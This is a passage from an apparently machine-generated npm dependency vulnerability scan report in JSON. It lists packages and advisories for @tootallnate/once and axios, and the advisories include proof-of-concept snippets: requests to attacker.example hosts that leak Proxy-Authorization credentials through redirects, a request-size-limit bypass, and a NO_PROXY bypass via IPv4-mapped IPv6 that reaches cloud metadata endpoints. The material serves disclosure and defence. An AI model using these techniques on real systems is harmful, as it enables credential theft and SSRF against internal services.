"PURL": "pkg:npm/xmlbuilder@13.0.2", "UID": "8c2be3e12111bbb6" }, "Version": "13.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10627, "EndLine": 10635 } ], "AnalyzedBy": "npm" }, { "ID": "xmlhttprequest-ssl@2.1.2", "Name": "xmlhttprequest-ssl", "Identifier": { "PURL": "pkg:npm/xmlhttprequest-ssl@2.1.2", "UID": "3dede53d251917b7" }, "Version": "2.1.2", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10636, "EndLine": 10643 } ], "AnalyzedBy": "npm" }, { "ID": "xtend@4.0.2", "Name": "xtend", "Identifier": { "PURL": "pkg:npm/xtend@4.0.2", "UID": "d7cf8d0c4716bf55" }, "Version": "4.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10644, "EndLine": 10652 } ], "AnalyzedBy": "npm" }, { "ID": "y18n@4.0.3", "Name": "y18n", "Identifier": { "PURL": "pkg:npm/y18n@4.0.3", "UID": "9367384f1293349b" }, "Version": "4.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8268, "EndLine": 8273 } ], "AnalyzedBy": "npm" }, { "ID": "y18n@5.0.8", "Name": "y18n", "Identifier": { "PURL": "pkg:npm/y18n@5.0.8", "UID": "bcfbb5cd62aa94d2" }, "Version": "5.0.8", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10653, "EndLine": 10662 } ], "AnalyzedBy": "npm" }, { "ID": "yallist@4.0.0", "Name": "yallist", "Identifier": { "PURL": "pkg:npm/yallist@4.0.0", "UID": "7b5971a8071e889d" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10663, "EndLine": 10668 } ], "AnalyzedBy": "npm" }, { "ID": "yargs@15.4.1", "Name": "yargs", "Identifier": { "PURL": "pkg:npm/yargs@15.4.1", "UID": "6718c6c083192d6a" }, "Version": "15.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cliui@6.0.0", "decamelize@1.2.0", "find-up@4.1.0", "get-caller-file@2.0.5", "require-directory@2.1.1", "require-main-filename@2.0.0", "set-blocking@2.0.0", "string-width@4.2.3", "which-module@2.0.1", "y18n@4.0.3", "yargs-parser@18.1.3" ], "Locations": [ { "StartLine": 8274, "EndLine": 8295 } ], "AnalyzedBy": "npm" }, { "ID": "yargs@17.7.2", "Name": "yargs", "Identifier": { "PURL": "pkg:npm/yargs@17.7.2", "UID": "c7cb7066f2927f1b" }, "Version": "17.7.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cliui@8.0.1", "escalade@3.2.0", "get-caller-file@2.0.5", "require-directory@2.1.1", "string-width@4.2.3", "y18n@5.0.8", "yargs-parser@21.1.1" ], "Locations": [ { "StartLine": 10669, "EndLine": 10687 } ], "AnalyzedBy": "npm" }, { "ID": "yargs-parser@18.1.3", "Name": "yargs-parser", "Identifier": { "PURL": "pkg:npm/yargs-parser@18.1.3", "UID": "ecffec74bd33ee63" }, "Version": "18.1.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "camelcase@5.3.1", "decamelize@1.2.0" ], "Locations": [ { "StartLine": 8296, "EndLine": 8308 } ], "AnalyzedBy": "npm" }, { "ID": "yargs-parser@21.1.1", "Name": "yargs-parser", "Identifier": { "PURL": "pkg:npm/yargs-parser@21.1.1", "UID": "64e922640a701c04" }, "Version": "21.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10688, "EndLine": 10697 } ], "AnalyzedBy": "npm" }, { "ID": "yocto-queue@0.1.0", "Name": "yocto-queue", "Identifier": { "PURL": "pkg:npm/yocto-queue@0.1.0", "UID": "a56c64d4eb0785d4" }, "Version": "0.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10708, "EndLine": 10720 } ], "AnalyzedBy": "npm" }, { "ID": "yoga-layout@2.0.1", "Name": "yoga-layout", "Identifier": { "PURL": "pkg:npm/yoga-layout@2.0.1", "UID": "9ea6363f39cc0732" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10721, "EndLine": 10726 } ], "AnalyzedBy": "npm" }, { "ID": "zod@3.25.76", "Name": "zod", "Identifier": { "PURL": "pkg:npm/zod@3.25.76", "UID": "6e738e059fa25f1c" }, "Version": "3.25.76", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10727, "EndLine": 10735 } ], "AnalyzedBy": "npm" }, { "ID": "zod-to-json-schema@3.25.2", "Name": "zod-to-json-schema", "Identifier": { "PURL": "pkg:npm/zod-to-json-schema@3.25.2", "UID": "2b2f9d6849b2d813" }, "Version": "3.25.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "zod@3.25.76" ], "Locations": [ { "StartLine": 10736, "EndLine": 10744 } ], "AnalyzedBy": "npm" } ], "Vulnerabilities": [ { "VulnerabilityID": "CVE-2026-3449", "VendorIDs": [ "GHSA-vpq2-c234-7xj6" ], "PkgID": "@tootallnate/once@2.0.0", "PkgName": "@tootallnate/once", "PkgIdentifier": { "PURL": "pkg:npm/%40tootallnate/once@2.0.0", "UID": "daf7aed08211b13b" }, "InstalledVersion": "2.0.0", "FixedVersion": "3.0.1, 2.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3449", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:e549923364dca3dc6571e7909cfd29df0c0ad8479cb4c2090c7142c9c916ebb5", "Title": "@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal", "Description": "Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.", "Severity": "LOW", "CweIDs": [ "CWE-705" ], "VendorSeverity": { "ghsa": 1, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P", "V3Score": 3.3, "V40Score": 1.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 4 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-3449", "https://github.com/TooTallNate/once", "https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a", "https://github.com/TooTallNate/once/issues/8", "https://github.com/TooTallNate/once/releases/tag/v2.0.1", "https://nvd.nist.gov/vuln/detail/CVE-2026-3449", "https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612", "https://www.cve.org/CVERecord?id=CVE-2026-3449" ], "PublishedDate": "2026-03-03T05:17:25.017Z", "LastModifiedDate": "2026-05-19T15:38:48.397Z" }, { "VulnerabilityID": "CVE-2026-44486", "VendorIDs": [ "GHSA-j5f8-grm9-p9fc" ], "PkgID": "axios@1.15.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.15.2", "UID": "912ac8b12f666bfc" }, "InstalledVersion": "1.15.2", "FixedVersion": "1.16.0, 0.32.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44486", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:56fb69109de92bad85ff6f963067a7659f4f4ab3b5439ddde1e12a12dd91fc35", "Title": "Axios: Proxy-Authorization header leaks to redirect target when proxy is re-evaluated to direct connection", "Description": "### Summary\n\nAxios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a `Proxy-Authorization` header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale `Proxy-Authorization` header can remain on the redirected request and be sent to the redirect target.\n\nThis affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected.\n\n### Impact\n\nAn attacker who controls a server that the victim application requests can redirect the request so that the attacker-controlled redirect target receives the victim’s proxy credentials.\n\nThe most relevant case is a Node.js application using an authenticated `HTTP_PROXY` for an initial `http://` request, with redirects enabled, where the redirect target resolves to no proxy, such as an `https://` URL when `HTTPS_PROXY` is unset.\n\nThis does not affect browser, XHR, or fetch adapter behaviour. It also does not affect requests with `maxRedirects: 0`.\n\n### Affected Functionality\n\nAffected functionality is limited to the Node.js HTTP adapter in `lib/adapters/http.js`.\n\nRelevant inputs and settings include:\n\n- `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY`.\n- Authenticated proxy URLs such as `http://user:pass@proxy.example:8080`.\n- Automatic redirect following through `follow-redirects`.\n- Axios proxy handling in `setProxy()`.\n- Redirect proxy handling through `beforeRedirects.proxy`.\n\n### Technical Details\n\nIn affected v1 releases, `setProxy()` adds `Proxy-Authorization` when a proxy with credentials is selected, but redirect handling calls `setProxy()` again without first clearing any existing proxy authorization header.\n\nIf the redirected URL resolves to no proxy, `setProxy()` does not add a new proxy configuration and also does not remove the old header. The redirected request can therefore carry the stale `Proxy-Authorization` header to the final origin.\n\nThe v1 fix in `afca61a` adds an `isRedirect` path that deletes any case variant of `Proxy-Authorization` before proxy settings are re-applied on redirect. The v0 backport in `2af6116` fixed the 0.x line for `0.32.0`.\n\n### Proof of Concept of Attack\n\n```js\nprocess.env.HTTP_PROXY = 'http://user:pass@127.0.0.1:8080';\ndelete process.env.HTTPS_PROXY;\n\nawait axios.get('http://attacker.example/start');\n```\n\nAttacker-controlled HTTP endpoint:\n\n```http\nHTTP/1.1 302 Found\nLocation: https://attacker.example/final\n```\n\nExpected result on affected versions:\n\n```text\nhttps://attacker.example/final receives:\nProxy-Authorization: Basic dXNlcjpwYXNz\n```\n\nExpected result on fixed versions:\n\n```text\nhttps://attacker.example/final receives no Proxy-Authorization header\n```\n\n### Workarounds\n\nSet `maxRedirects: 0` and handle redirects manually.\n\nAvoid using authenticated proxy environment variables for requests to untrusted HTTP origins unless redirect behaviour is controlled.\n\nEnsure proxy environment variables are configured consistently across protocols so redirects do not unexpectedly change from proxied to direct connections.\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Source\u003c/summary\u003e\n\n### Summary\nAxios' Node.js HTTP adapter can leak proxy credentials to a redirect target origin. When an initial request is sent through an authenticated HTTP proxy, Axios adds a `Proxy-Authorization` header. On redirect, Axios re-evaluates proxy settings, but if the redirected request no longer uses a proxy, the stale `Proxy-Authorization` header is not cleared. As a result, the redirect target can receive the proxy credential directly.\n\nThis issue affects the Node.js HTTP adapter and can be reproduced when the initial request uses `HTTP_PROXY` with authentication, redirects are enabled, and the redirected request is resolved to no proxy, such as when `HTTPS_PROXY` is unset or the redirect target is excluded by `NO_PROXY`.\n\n### Details\nIn the current implementation:\n\n- `setProxy()` adds `Proxy-Authorization` when a proxy with credentials is in use.\n- On redirects, Axios re-invokes `setProxy()` for the redirected request.\n- If the redirected URL re-evaluates to \"no proxy\", `setProxy()` does not clear the previously added `Proxy-Authorization` header.\n- The redirected request therefore reuses the stale header and sends it to the final origin.\n\nRelevant code locations:\n\n- `lib/adapters/http.js`\n- `setProxy()` adds `Proxy-Authorization`\n- redirect handling re-applies proxy logic through `beforeRedirects.proxy`\n- no cleanup is performed when the recomputed redirect request no longer uses a proxy\n\n### PoC\n1. The victim sends `GET http://\u003cattacker-site\u003e/start`\n2. The request goes through a local authenticated `corp proxy`\n3. The attacker-controlled HTTP endpoint returns `302 Location: https://\u003cattacker-site\u003e/final`\n4. The redirected HTTPS request no longer uses a proxy\n5. The attacker-controlled HTTPS endpoint receives the stale `Proxy-Authorization` header\n\nObserved output:\n\n```text\n[corp-proxy] Proxy-Authorization received: Basic dXNlcjpwYXNz\n[attacker-http] GET /start\n[attacker-https] GET /final\n[attacker-https] Proxy-Authorization received: Basic dXNlcjpwYXNz\nLeak reproduced: Proxy-Authorization was sent to the attacker HTTPS origin.\n```\n\nThis demonstrates that the proxy credential is exposed to the redirect target origin.\n\n### Impact\nExposes authenticated proxy credentials to an attacker-controlled origin.\n\u003c/details\u003e\n\n---", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 } }, "References": [ "https://github.com/axios/axios", "https://github.com/axios/axios/commit/afca61a070728e717203c2bc21e7b589b59b858b", "https://github.com/axios/axios/pull/10794", "https://github.com/axios/axios/releases/tag/v0.32.0", "https://github.com/axios/axios/releases/tag/v1.16.0", "https://github.com/axios/axios/security/advisories/GHSA-j5f8-grm9-p9fc" ] }, { "VulnerabilityID": "CVE-2026-44487", "VendorIDs": [ "GHSA-p92q-9vqr-4j8v" ], "PkgID": "axios@1.15.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.15.2", "UID": "912ac8b12f666bfc" }, "InstalledVersion": "1.15.2", "FixedVersion": "1.16.0, 0.32.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44487", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:2df18f904e6f8cd96b31628c12863116eae00db4d77960543ea8c9b594672b78", "Title": "Axios: Proxy-Authorization Credential Leak to Origin Server Across HTTP-to-HTTPS Redirect in Axios Node.js HTTP Adapter", "Description": "## Summary\n\nAxios’s Node.js HTTP adapter may forward a `Proxy-Authorization` header to a redirected origin during specific proxy-to-direct redirect flows.\n\nThis affects Node.js usage, where an initial HTTP request is sent through an authenticated HTTP proxy, redirects are followed, and the redirected URL is no longer proxied. Under affected redirect shapes, the final origin can receive the proxy credential that was intended only for the outbound proxy.\n\n## Impact\n\nA malicious or attacker-controlled origin can cause an axios client to disclose its configured proxy credentials if all required conditions are present.\n\nThe leak is limited to Node.js HTTP adapter requests. Browser, XHR, fetch, and React Native adapter paths are not affected by this Node-specific proxy handling path.\n\nThe practical impact depends on the leaked credentials. If the credential is reusable and the proxy is reachable by the attacker, the attacker may be able to authenticate to that proxy, subject to the proxy’s own network exposure, authorisation policy, and credential scope.\n\n## Affected Functionality\n\nAffected functionality requires all of the following:\n\n- Axios running in Node.js with the HTTP adapter.\n- An initial `http://` request using an authenticated proxy from `config.proxy` or proxy environment variables.\n- Redirect following enabled.\n- A redirect target for which no proxy applies, such as no matching `HTTPS_PROXY` or a matching `NO_PROXY`.\n- A redirect shape treated as same-host or otherwise not stripped by the redirect layer’s confidential-header handling.\n\nUnaffected functionality includes browser adapters, requests with `maxRedirects: 0`, requests without proxy credentials, and redirect flows where the redirect layer strips `Proxy-Authorization` before axios reconfigures the redirected request.\n\n## Technical Details\n\nIn affected versions, `lib/adapters/http.js` adds `Proxy-Authorization` in `setProxy()` when a proxy with credentials is used.\n\nAxios also installs redirect proxy handling so redirected requests can re-run proxy resolution. Before the fix, when the redirected request no longer resolved to a proxy, `setProxy()` did not clear a `Proxy-Authorization` header inherited from the previous request options. If `follow-redirects` did not remove that header for the specific redirect shape, the redirected direct request carried the stale proxy credential to the origin.\n\nThe `1.x` fix in commit `afca61a` changes `setProxy(options, configProxy, location, isRedirect)` so redirect re-invocation removes every case variant of `Proxy-Authorization` before applying proxy settings for the next hop. Regression tests in `tests/unit/adapters/http.test.js` cover no-proxy redirects, `NO_PROXY`, different proxy targets, casing variants, and an end-to-end redirect flow.\n\nThe `0.x` fixed release `0.32.0` includes a backport-style `removeProxyAuthorization()` guard in `lib/adapters/http.js`.\n\n## Proof of Concept of Attack\n\nSafe local outline using dummy credentials:\n\n```js\nprocess.env.HTTP_PROXY = 'http://user:pass@127.0.0.1:8080';\ndelete process.env.HTTPS_PROXY;\n\n// The local HTTP proxy receives this request and returns:\n// HTTP/1.1 302 Found\n// Location: https://attacker.test/final\nawait axios.get('http://attacker.test/start');\n```\n\nExpected vulnerable behaviour:\n\n```text\nProxy receives initial request:\nProxy-Authorization: Basic dXNlcjpwYXNz\n\nFinal HTTPS origin receives redirected request:\nProxy-Authorization: Basic dXNlcjpwYXNz\n```\n\nExpected fixed behaviour:\n\n```text\nFinal HTTPS origin receives no Proxy-Authorization header.\n```\n\n## Workarounds\n\nSet `maxRedirects: 0` and handle redirects manually, ensuring `Proxy-Authorization` is not copied to requests that are not sent through the proxy.\n\nAvoid using reusable authenticated HTTP proxy credentials for requests to untrusted origins. If exposure is suspected, rotate the proxy credential.\n\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Source\u003c/summary\u003e\n\n### Summary\n\nAxios’s Node.js `http` adapter can incorrectly forward a retained `Proxy-Authorization` header to the final HTTPS origin during certain HTTP-to-HTTPS redirect flows.\n\nWhen an initial HTTP request is sent through an authenticated `HTTP_PROXY`, and the redirected HTTPS request is sent directly because no proxy applies to the redirected HTTPS URL, Axios retains the stale `Proxy-Authorization` header and forwards it to the final origin.\n\n### Details\n\nThe issue occurs during a proxy-to-direct transition across redirects.\n\nWhen Axios sends an initial HTTP request through an authenticated `HTTP_PROXY`, it correctly includes `Proxy-Authorization` for the proxy hop. If that response redirects to an HTTPS URL on the same hostname, and no proxy applies to the redirected HTTPS URL, the redirected request is sent directly to the final origin instead of through the proxy.\n\nIn the affected flow, the final HTTPS origin receives a `Proxy-Authorization` header value that was intended only for the outbound proxy.\n\nWhether the issue is observable depends on how the redirect layer compares the host and port across the redirect. In the affected redirect shape, confidential-header handling does not remove the retained `Proxy-Authorization` header before the redirected request is sent.\n\n#### Root Cause Analysis\n\nBased on code review, Axios appears to create the stale header condition in its Node.js `http` adapter.\n\nIn lib/adapters/http.js:\n- When a proxy is used, Axios adds `Proxy-Authorization` in setProxy().\n- Axios also re-runs proxy resolution after redirects via its redirect hook.\n- However, when the redirected request no longer uses a proxy, Axios does not explicitly clear a previously set Proxy-Authorization header.\n\nAs a result, Axios correctly adds proxy credentials for the first proxied request, but does not clear them when a later redirected request becomes direct.\n\nA dependent factor is the behavior of the redirect layer. In the affected redirect shape, confidential-header handling does not remove the retained `Proxy-Authorization` header before the redirected request is sent. This appears to be why the issue is observable only for certain redirect shapes.\n\n#### Client Conditions\n- the initial HTTP request uses an authenticated `HTTP_PROXY`\n- no proxy applies to the redirected HTTPS URL (for example, no `HTTPS_PROXY` is configured)\n- redirects are followed\n- the redirect is treated as same-host by the redirect layer\n\nUnder that redirect shape, the retained `Proxy-Authorization` header is not removed before the redirected request is sent to the final HTTPS origin.\n\n### Reproduction Outline\n\nDetailed reproduction instructions were shared with the maintainers during coordinated disclosure. The public outline below preserves the validated configuration and observable behavior needed to assess exposure, while omitting environment-specific test-harness details.\n\nThe issue was reproduced only in a researcher-controlled local test environment using dummy proxy credentials.\n\nThe issue was confirmed under the following conditions:\n\n- axios 1.13.6\n- follow-redirects 1.15.11\n- an authenticated proxy applying to the initial HTTP request\n- no proxy applying to the redirected HTTPS URL\n- redirects enabled\n- an HTTP-to-HTTPS redirect that is treated as same-host by the redirect layer\n\n#### Observed behavior\n\n- The initial HTTP request is sent through the proxy and includes `Proxy-Authorization`.\n- The redirected HTTPS request is sent directly to the final origin.\n- The redirected HTTPS request still includes the previously generated `Proxy-Authorization` header.\n- The final origin can receive a `Proxy-Authorization` header value that was intended only for the proxy.\n\n#### Expected behavior\n\nAxios should not send the `Proxy-Authorization` header on a redirected request that is no longer sent through a proxy.\n\n### Impact\n\nUnder the affected redirect and proxy configuration, the final HTTPS origin may receive a retained `Proxy-Authorization` header value that was intended only for the outbound proxy.\n\nIf that credential is valid and reusable, and the outbound proxy is reachable by the attacker, the attacker may be able to authenticate to that proxy with the affected environment’s proxy credential, subject to the credential’s scope and the proxy’s access controls.\n\u003c/details\u003e\n\n---", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N", "V40Score": 8.2 } }, "References": [ "https://github.com/axios/axios", "https://github.com/axios/axios/releases/tag/v0.32.0", "https://github.com/axios/axios/releases/tag/v1.16.0", "https://github.com/axios/axios/security/advisories/GHSA-p92q-9vqr-4j8v" ] }, { "VulnerabilityID": "CVE-2026-44488", "VendorIDs": [ "GHSA-777c-7fjr-54vf" ], "PkgID": "axios@1.15.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.15.2", "UID": "912ac8b12f666bfc" }, "InstalledVersion": "1.15.2", "FixedVersion": "1.16.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44488", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:cf77f302ff082887f584e8b3277b3590826b89b27e7adff31dba706bb29a869d", "Title": "Allocation of Resources Without Limits or Throttling in Axios", "Description": "## Summary\n\nAxios versions `1.7.0` through `1.15.x` did not enforce configured request and response size limits when requests were sent with the `fetch` adapter. Applications that selected `adapter: 'fetch'`, or ran in environments where axios resolved to the fetch adapter, could receive or send bodies larger than `maxContentLength` or `maxBodyLength` despite those limits being explicitly configured.\n\nThis can cause resource exhaustion in server-side usage when a malicious or compromised server returns an oversized response, when an attacker can supply a large `data:` URL, or when an application forwards attacker-controlled request bodies through axios while relying on `maxBodyLength` as a boundary.\n\n## Impact\n\nThe impact is availability-only. Affected applications may process, buffer, or transmit data beyond the configured limit, potentially exhausting memory, CPU, or network resources.\n\nThis does not affect axios’s default unlimited behaviour by itself: `maxContentLength` and `maxBodyLength` default to `-1`. The vulnerability exists when an application has configured finite limits and expects axios to enforce them.\n\nServer-side runtimes are the primary concern. Browser impact is generally constrained by the browser process and browser fetch behavior, and should not be described as server process exhaustion.\n\n## Affected Functionality\n\nAffected functionality includes requests using the built-in `fetch` adapter with finite `maxContentLength` or `maxBodyLength` values.\n\nRelevant configurations include:\n\n- `adapter: 'fetch'`\n- `adapter: ['fetch', ...]` when `fetch` is selected\n- environments where neither `xhr` nor `http` is available and axios falls back to `fetch`\n- custom fetch environments configured through `env.fetch`\n\nUnaffected functionality includes:\n\n- Node.js default `http` adapter enforcement\n- versions before the fetch adapter was introduced\n- configurations that do not rely on finite axios size limits\n\n## Technical Details\n\nIn vulnerable versions, `lib/adapters/fetch.js` destructured request config without `maxContentLength` or `maxBodyLength`. The adapter dispatched `fetch()` and then materialized the response through `text()`, `arrayBuffer()`, `blob()`, or related resolvers without checking the configured response limit.\n\nThe fix in `e5540dc` added:\n\n- `maxContentLength` and `maxBodyLength` reads in `lib/adapters/fetch.js`\n- upfront `data:` URL decoded-size checks\n- outbound body-size checks before dispatch\n- `Content-Length` response pre-checks\n- streaming response enforcement\n- fallback checks for environments without `ReadableStream`\n- regression tests in `tests/unit/adapters/fetch.test.js`\n\n## Proof of Concept of Attack\n\n```js\nimport http from 'node:http';\nimport axios from 'axios';\n\nconst server = http.createServer((req, res) =\u003e {\n let received = 0;\n\n req.on('data', chunk =\u003e {\n received += chunk.length;\n });\n\n req.on('end', () =\u003e {\n res.end(JSON.stringify({ received }));\n });\n});\n\nawait new Promise(resolve =\u003e server.listen(0, resolve));\nconst url = `http://127.0.0.1:${server.address().port}/`;\n\nawait axios.post(url, 'A'.repeat(2 * 1024 * 1024), {\n adapter: 'fetch',\n maxBodyLength: 1024\n});\n\n// Vulnerable versions succeed and the server receives 2097152 bytes.\n// Fixed versions reject with ERR_BAD_REQUEST.\n\nserver.close();\n```\n\n## Workarounds\n\nUse the Node.js `http` adapter for server-side requests where finite size limits are security-relevant.\n\nValidate or cap attacker-controlled request bodies before passing them to axios.\n\nReject or strictly allowlist attacker-controlled URL schemes, especially `data:` URLs, before calling axios.\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Report\u003c/summary\u003e\n\n### Summary\nWhen Axios is used with adapter: 'fetch', configured body/response size limits are not enforced. This allows oversized uploads/downloads (including data: URLs) despite explicit limits, which can lead to memory/resource exhaustion in server-side usage.\n\n### Details\nmaxBodyLength and maxContentLength are not applied in the fetch adapter flow:\n - lib/adapters/fetch.js (146-160): config destructuring does not include these controls.\n - lib/adapters/fetch.js (220-234): request is dispatched with fetch() without request-size enforcement.\n - lib/adapters/fetch.js (267-283): response is materialized via text(), arrayBuffer(), blob(), etc. without response-size checks.\nBy contrast, the HTTP adapter enforces both limits.\n\n### PoC\n Environment:\n - Axios main at commit f7a4ee2\n - Node v24.2.0\n\nSteps:\n 1. Start an HTTP server that counts received bytes and echoes {received}.\n 2. Send 2 MiB with:\n - adapter: 'fetch'\n - maxBodyLength: 1024\n 3. Request a 4 KiB data: URL with:\n - adapter: 'fetch'\n - maxContentLength: 16\n\nExpected secure behavior: both requests rejected.\n Observed:\n - Upload: success, server received 2097152\n - data: response: success, length 4096\n\n### Impact\nType: DoS / resource exhaustion due to limit bypass.\nImpacted: applications using Axios fetch adapter as a server-side security control boundary for untrusted request/response sizes.\n\u003c/details\u003e\n\n---", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/axios/axios", "https://github.com/axios/axios/pull/10795", "https://github.com/axios/axios/pull/10796", "https://github.com/axios/axios/releases/tag/v1.16.0", "https://github.com/axios/axios/security/advisories/GHSA-777c-7fjr-54vf" ] }, { "VulnerabilityID": "CVE-2026-44492", "VendorIDs": [ "GHSA-pjwm-pj3p-43mv" ], "PkgID": "axios@1.15.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.15.2", "UID": "912ac8b12f666bfc" }, "InstalledVersion": "1.15.2", "FixedVersion": "1.16.0, 0.32.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44492", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:e4a62b5d5c0f52a529186fe2cee799c4e398d2d39ecffd9dc2e20374e4982bc2", "Title": "axios's shouldBypassProxy does not recognize IPv4-mapped IPv6 addresses, allowing NO_PROXY bypass (incomplete fix for CVE-2025-62718)", "Description": "### Summary\nshouldBypassProxy, introduced in v1.15.0 to fix CVE-2025-62718, does not normalise IPv4-mapped IPv6 addresses. When NO_PROXY lists an IPv4 address such as `127.0.0.1` or `169.254.169.254`, a request URL using the IPv4-mapped IPv6 form (`::ffff:7f00:1`, `::ffff:a9fe:a9fe`) still routes through the configured proxy. Node.js resolves these addresses to the underlying IPv4 host, so the request reaches the internal service via the proxy rather than being blocked.\n\n### Details\nlib/helpers/shouldBypassProxy.js (v1.15.0): \n\n```javascript \n const LOOPBACK_ADDRESSES = new Set(['localhost', '127.0.0.1', '::1']); \n const isLoopback = (host) =\u003e LOOPBACK_ADDRESSES.has(host); \n \n // normalizeNoProxyHost strips brackets and trailing dots, but not ::ffff: prefix \n return hostname === entryHost || (isLoopback(hostname) \u0026\u0026 isLoopback(entryHost)); \n```\n \nThe WHATWG URL parser canonicalises `http://[::ffff:127.0.0.1]/` to hostname `[::ffff:7f00:1]`. After bracket-stripping: `::ffff:7f00:1`. This string does not match 127.0.0.1 in NO_PROXY and is not in LOOPBACK_ADDRESSES, so shouldBypassProxy returns false and the proxy is used. proxy-from-env (called before shouldBypassProxy) has the same gap - it does not equate ::ffff:7f00:1 with 127.0.0.1 - so neither layer catches the bypass.\n\n### PoC\n```javascript\n\n// NO_PROXY=127.0.0.1,localhost,::1 HTTP_PROXY=http://attacker:8080\nimport shouldBypassProxy from 'axios/lib/helpers/shouldBypassProxy.js'; \n \n// All three should return true (bypass proxy). Only the first two do. \nconsole.log(shouldBypassProxy('http://127.0.0.1/')); // true [OK] \nconsole.log(shouldBypassProxy('http://[::1]/')); // true [OK] \nconsole.log(shouldBypassProxy('http://[::ffff:127.0.0.1]/')); // false \u003c- bypass \nconsole.log(shouldBypassProxy('http://[::ffff:7f00:1]/')); // false \u003c- bypass\n\n``` \n \nNode.js routes ::ffff:7f00:1 to 127.0.0.1: \n\n``` \n// net.connect({ host: '::ffff:7f00:1', port: 80 }) reaches a service \n// bound to 127.0.0.1:80 — confirmed on Node.js v24, Linux and macOS. \n``` \nCloud metadata SSRF: ::ffff:a9fe:a9fe = ::ffff:169.254.169.254. If NO_PROXY=169.254.169.254 is set to block IMDS access, a request to http://[::ffff:a9fe:a9fe]/latest/meta-data/ bypasses it. \n \n#### Fix \n \nCanonicalise IPv4-mapped IPv6 in normalizeNoProxyHost before any comparison: \n \n ```javascript \nconst ipv4MappedDotted = 